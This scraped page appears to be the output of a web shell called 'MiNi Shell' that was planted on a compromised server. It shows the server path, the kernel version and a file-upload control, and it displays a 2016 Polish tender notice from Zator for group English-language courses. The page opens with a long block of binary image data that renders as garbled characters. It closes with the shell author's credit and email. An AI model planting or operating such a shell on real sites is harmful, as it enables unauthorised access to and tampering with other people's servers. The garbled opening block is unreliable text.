JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160413/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160413/86800-N-2016.html

<p class="kh_header"><b>Zator: Zorganizowanie i przeprowadzenie szkoleń w formie grupowych kursów języka angielskiego, realizowanych w ramach Projektu KIK/14 Dolina Karpia - szansa na przyszłość. Nr procedury ZAR/P/5/2016</b><br>
<b>Numer ogłoszenia: 86800 - 2016; data zamieszczenia: 13.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zatorska Agencja Rozwoju Sp. z o.o. , ul. Juliusza Słowackiego 15, 32-640 Zator, woj. małopolskie, tel. 795 391 008.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.caz.zator.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Sp. z o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń w formie grupowych kursów języka angielskiego, realizowanych w ramach Projektu KIK/14 Dolina Karpia - szansa na przyszłość. Nr procedury ZAR/P/5/2016.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie szkoleń w formie grupowych kursów języka angielskiego, realizowanych w ramach Projektu KIK/14 Dolina Karpia - szansa na przyszłość.
2.	Kursy zostaną zrealizowane w ramach Projektu KIK/14 pn.: Dolina Karpia - szansa na przyszłość. Partnerski Program Aktywizacji Społeczno - Gospodarczej i Promocji Przedsiębiorczości realizowany poprzez zastosowanie komplementarnych instrumentów pobudzających regionalny rynek pracy, wzmocnienie podmiotów gospodarczych oraz wykorzystanie lokalnych produktów w celu poprawy jakości życia na obszarach wiejskich. Projekt współfinansowany przez Szwajcarię w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej. 
3.	W ramach zamówienia zrealizowanych zostanie maksymalnie 10 kursów języka angielskiego (jeden kurs dla jednej grupy, grupy mogą się powtarzać). Pojedynczy kurs obejmuje 40 godzin lekcyjnych. Planowany harmonogram zajęć dla jednej grupy: dwa razy w tygodniu po dwie godziny lekcyjne (1 godzina lekcyjna = 45 minut), przez dziesięć kolejnych tygodni (2x2x10=40 godzin lekcyjnych).  
4.	Planowana maksymalna łączna liczba godzin lekcyjnych dla wszystkich grup: 400 godzin lekcyjnych (tj.: maksymalnie 10 grup, po 40 godzin lekcyjnych każda). Liczba ta może ulec zmniejszeniu.
5.	Planowana maksymalna liczebność jednej grupy: 8 osób. Liczba ta może ulec zmniejszeniu.
6.	Kursy dla każdej z grup będą prowadzone w dni robocze w godzinach pracy Centrum Aktywizacji Zawodowej.
7.	Pojedynczy kurs języka obejmować będzie jeden z niżej wymienionych zakresów i powinien być dopasowany do zdiagnozowanego przez Wykonawcę poziomu grupy:
7.1.	Język Angielski w biznesie - prezentacja własnej firmy /wytwarzanych produktów/ sprzedawanych usług, nawiązywanie kontaktów, rozmowy telefoniczne, praktyka dyskutowania oraz umiejętności przekazywania bardziej skomplikowanych myśli, negocjacje oraz spotkania biznesowe - symulacje, odgrywanie scenek, w tym nawiązanie do takich tematów jak: wydarzenia bieżące, tematy ochrony środowiska i problemów społecznych, polityka, ochrona zdrowia, system zabezpieczenia społecznego, turystyka, edukacja i praktyki, reklama i media, technologia i powszechna komputeryzacja, zagadnienia globalizacji, prezentacja wykresów i danych oraz opisywanie trendów ekonomicznych i społecznych, porównywanie zasad działalności firm i ekonomii w różnych krajach w celu nawiązania. Podczas kursu uczestnicy nabędą w języku angielskim swobodę i umiejętność: wyrażania aprobaty lub jej braku, umiejętność przerywania, precyzowanie i potwierdzenie, pytania o komentarz, podsumowanie, zadawanie odpowiednich pytań, obrona lub niezgodność opinii , perswadowanie i kompromis, składanie oferty, propozycji, sugestie, otwieranie i zamykanie spotkań.
7.2.	Język Angielski w branży turystycznej - kurs dedykowany osobom zajmującym się zawodowo turystyką  oraz uczniów szkół turystycznych i hotelarskich. Celem kursu jest zdobycie przez uczestników praktycznej umiejętności funkcjonowania w środowisku anglojęzycznym na polu zawodowym. Kurs prowadzi do uzupełnienia i podniesienia poziomu języka ogólnego, ale także zapoznanie z szerokim zakresem słownictwa związanego z turystyką i hotelarstwem. Program kursu powinien obejmować: znajomość języka i terminologii związanej z  turystyką i hotelarstwem: praca w biurze podróży, obiekcie noclegowo-turystycznym, branży gastronomicznej, parku rozrywki itp.; zarządzanie turystyką, relacje z klientami, pilotowanie wycieczek, podróże służbowe, rezerwacje. Umiejętność wydawania instrukcji, prowadzenia rozmów telefonicznych, dyskusji, a także wygłaszania krótkich prezentacji. Techniki sporządzania dokumentów typu: oferta, e-mail, notatka służbowa, opis, list, zaproszenie do współpracy ,itp. Umiejętność rozumienia tekstów  i artykułów o tematyce turystycznej. Umiejętność rozumienia ze słuchu tekstów dotyczących  środków transportu, hotelarstwa, rekreacji  itp. Umiejętność prowadzenia negocjacji oraz dyskusji, prezentacji na tematy związanie z turystyką. Powtórzenie i uzupełnienie gramatyki z naciskiem na struktury niezbędne do podstawowej komunikacji w środowisku pracy.
8.	Wykonawca dostarczy dla każdego uczestnika wszystkie niezbędne do realizacji kursu materiały dydaktyczne (podręczniki, skrypty, zeszyty, długopisy, słowniki, zestawy multimedialne).
9.	Wykonawca przeprowadzi test początkowy celem uzyskania informacji o poziomie wiedzy uczestników oraz testy końcowe sprawdzające zdobytą wiedzę. 
10.	Poziom i harmonogram kursu należy dostosować do potrzeb i możliwości uczestników.
11.	Czas realizacji: do 30 listopada 2016 r. 
12.	 Szkolenia będą się odbywać w Centrum Aktywizacji Zawodowej w Zatorze przy ul. Juliusza Słowackiego 15. Zamawiający zastrzega sobie możliwość zmiany terminu i miejsca szkoleń, o czym powiadomi wykonawcę min. 3 dni robocze przed rozpoczęciem danego szkolenia.
13.	Zleceniodawca gwarantuje salę szkoleniową wyposażoną w projektor.
14.	Kursy odbywać się będą zgodnie z harmonogramem uzgodnionym i przekazanym Zamawiającemu 10 dni przed rozpoczęciem zajęć.
15.	Zmiana harmonogramu może nastąpić za zgodą Zamawiającego z zastrzeżeniem, że termin realizacji zamówienia jest niezmienny (30.11.2016r.).
16.	Wykonawca zobowiązuje się zapewnić odpowiednią kadrę szkoleniową zdolną do wykonania zamówienia. 
17.	Wykonawca oświadcza iż dysponuje kadrą niezbędną do realizacji zamówienia.
18.	Wykonawca, z którym zostanie zawarta umowa, przygotuje i przedstawi do akceptacji Zamawiającemu szczegółowy program planowanych kursów w formie konspektu.
19.	Wykonawca będzie zobowiązany do prowadzenia list obecności na zajęciach, które muszą być oznaczone zgodnie z zasadami promocji Szwajcarsko - Polskiego Programu Współpracy - SPPW.
20.	Wszystkie zajęcia muszą być przeprowadzone na miejscu wskazanym przez Zamawiającego. Nie dopuszcza się prowadzenia zajęć drogą elektroniczną, metodą e-learningu, w formie eksternistycznej itp. - za wyjątkiem indywidualnych konsultacji dla uczestników szkoleń.
21.	Koszt jednego szkolenia obejmuje:
-materiały szkoleniowe w postaci podręczników lub skryptów edukacyjnych dla każdego uczestnika szkolenia i jeden zestaw dla Zamawiającego (wydruk czy kopia nie może naruszać obowiązującej ustawy o prawie autorskim i prawach pokrewnych), podręczniki, zeszyty, długopisy, słowniki, zestawy multimedialne, konsultacje; 
-dojazd do miejsca wskazanego przez Zamawiającego;
-przeprowadzenie szkolenia; 
-zaświadczenie o ukończonym szkoleniu dla każdego uczestnika;
-oraz inne zgodnie z niniejszą SIWZ.
22.	Wykonawca przygotowuje dokumentację fotograficzną z każdych przeprowadzonych zajęć i zobowiązuje się ją przedłożyć zamawiającemu w terminie 2 dni roboczych od ich zakończenia.
23.	Jedna grupa kursowa obejmuje maksymalnie 8 osób.
24.	Wykonawca zapewni sprzęt techniczny niezbędny do zrealizowania szkoleń w tym w szczególności komputer oraz inne pomoce niezbędne do realizacji prezentacji multimedialnych przez prowadzącego szkolenie.
25.	Kod zamówienia w ramach wspólnego słownika zamówień (CPV): 805 800 00  - 3
26.	Cena za pojedynczy kurs, niezależnie od poziomu grupy i zakresu jest stała i będzie obowiązywać przez cały okres ważności umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.58.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada wpis do Rejestru Instytucji Szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę instytucji szkoleniowej (art. 20 ustawy z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy, tj. Dz. U. z 2015r. poz. 149 z późn. zm.)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że na czas realizacji szkolenia dysponuje lub będzie dysponował sprzętem adekwatnym do zamówienia umożliwiające realizację szkoleń (oświadczenie)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże, że na czas realizacji zamówienia będzie dysponował odpowiednią kadrą szkoleniową oddelegowaną do pełnienia funkcji trenera na kursach będących przedmiotem niniejszego zamówienia - każdy z trenerów musi posiadać wykształcenie wyższe ukończone na kierunku filologia angielska lub lingwistyka stosowana z zakresu języka angielskiego oraz legitymować się doświadczeniem w postaci należytego przeprowadzenia w ciągu ostatniego roku przed upływem terminu składania ofert, co najmniej dwóch grupowych kursów języka angielskiego, z których każdy trwał co najmniej 10 godzin lekcyjnych. Wykazane osoby muszą posiadać wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje wymagań</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.1.	Oświadczenie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 z późn. zm.) według załącznika nr 2 do niniejszej specyfikacji, 
1.2.	Oświadczenie z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 z późn. zm.) według załącznika nr 3 do niniejszej specyfikacji,
1.3.	Oświadczenie z art. 24 ust.2 pkt.5 i art. 26 ust.2 pkt 2d ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (tekst jedn. Dz. U. z 2013 r., poz. 907 z późn. zm.) według załącznika nr 3a do niniejszej specyfikacji
1.4.	Oświadczenie o prawie do dysponowania sprzętem technicznym, niezbędnym do zorganizowania i przeprowadzenie szkoleń w formie grupowych kursów języka angielskiego, realizowanych w ramach Projektu KIK/14 Dolina Karpia - szansa na przyszłość (załącznik nr 4). 
1.5.	Wykaz kadry szkoleniowej (osób, które będą uczestniczyć w wykonywaniu zamówienia) według załącznika nr 5 do niniejszej specyfikacji. 
1.6.	Wzór listy obecności według załącznika nr 6 zatwierdzony parafą/podpisem.
1.7.	Wykonawca jest zobowiązany dołączyć potwierdzoną za zgodność z oryginałem kserokopię, dokumentów potwierdzających wpis do Rejestru Instytucji Szkoleniowych.
1.8.	Wykonawca, o ile posiada, jest zobowiązany dołączyć potwierdzoną za zgodność z oryginałem kserokopię certyfikatu jakości ISO, potwierdzającego jakość świadczonych usług szkoleniowych. Wykonawca jest zobowiązany, poprzez skreślenie niepotrzebnego sformułowania posiada / nie posiada, do oznaczenia w punkcie 4 Formularza ofertowego czy posiada certyfikat jakości usług ISO na prowadzenie szkoleń.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Posiadanie certyfikatu jakości usług ISO na prowadzenie szkoleń - 25</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się zmianę istotnych postanowień zawartej umowy, dotyczących terminu wykonania umowy, terminów płatności, zmiany kadry szkoleniowej w przypadku wystąpienia zdarzeń losowych oraz innych postanowień umowy, w uzasadnionych przypadkach za zgodą Zamawiającego, a także dotyczących innych zmian korzystnych dla Zamawiającego, aneksem do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.caz.zator.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zatorska Agencja Rozwoju Sp. z o.o., ul. Juliusza Słowackiego 15, 32-640 Zator.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2016 godzina 10:00, miejsce: Zatorska Agencja Rozwoju Sp. z o.o., ul. Juliusza Słowackiego 15, 32-640 Zator; sekretariat - pokój 2.05 (II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Szwajcarię  w ramach szwajcarskiego programu współpracy z nowymi krajami członkowskimi Unii Europejskiej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com